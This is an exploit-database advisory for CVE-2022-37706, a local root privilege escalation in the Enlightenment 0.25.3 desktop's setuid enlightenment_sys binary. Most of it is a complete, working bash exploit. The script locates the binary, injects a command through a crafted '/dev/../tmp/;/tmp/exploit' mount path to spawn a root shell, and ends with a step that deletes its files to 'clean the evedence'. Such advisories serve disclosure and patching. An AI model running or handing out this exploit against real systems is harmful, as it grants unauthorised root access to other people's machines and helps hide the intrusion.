Enlightenment 0.25.3 Privilege Escalation

Credit: nu11secur1ty
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-264

## Title: Enlightenment Version: 0.25.3 LPE ## Author: nu11secur1ty ## Date: 12.26.2022 ## Vendor: https://www.enlightenment.org/ ## Software: https://www.enlightenment.org/download ## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706 ## Description: The Enlightenment Version: 0.25.3 is vulnerable to local privilege escalation. Enlightenment_sys in Enlightenment before 0.25.4 allows local users to gain privileges because it is setuid root, and the system library function mishandles pathnames that begin with a /dev/.. substring If the attacker has access locally to some machine on which the machine is installed Enlightenment he can use this vulnerability to do very dangerous stuff. ## STATUS: CRITICAL Vulnerability ## Tested on: ```bash DISTRIB_ID=Ubuntu DISTRIB_RELEASE=22.10 DISTRIB_CODENAME=kinetic DISTRIB_DESCRIPTION="Ubuntu 22.10" PRETTY_NAME="Ubuntu 22.10" NAME="Ubuntu" VERSION_ID="22.10" VERSION="22.10 (Kinetic Kudu)" VERSION_CODENAME=kinetic ID=ubuntu ID_LIKE=debian HOME_URL="https://www.ubuntu.com/" SUPPORT_URL="https://help.ubuntu.com/" BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/" PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy" UBUNTU_CODENAME=kinetic LOGO=ubuntu-logo ``` [+] Exploit: ```bash #!/usr/bin/bash # Idea by MaherAzzouz # Development by nu11secur1ty echo "CVE-2022-37706" echo "[*] Trying to find the vulnerable SUID file..." echo "[*] This may take few seconds..." # The actual problem file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1) if [[ -z ${file} ]] then echo "[-] Couldn't find the vulnerable SUID file..." echo "[*] Enlightenment should be installed on your system." exit 1 fi echo "[+] Vulnerable SUID binary found!" echo "[+] Trying to pop a root shell!" mkdir -p /tmp/net mkdir -p "/dev/../tmp/;/tmp/exploit" echo "/bin/sh" > /tmp/exploit chmod a+x /tmp/exploit echo "[+] Welcome to the rabbit hole :)" ${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net read -p "Press any key to clean the evedence..." echo -e "Please wait... " sleep 5 rm -rf /tmp/exploit rm -rf /tmp/net echo -e "Done; Everything is clear ;)" ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706) ## Proof and Exploit: [href](https://streamable.com/zflbgg) ## Time spent `01:00:00`

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2023, cxsecurity.com


Back to Top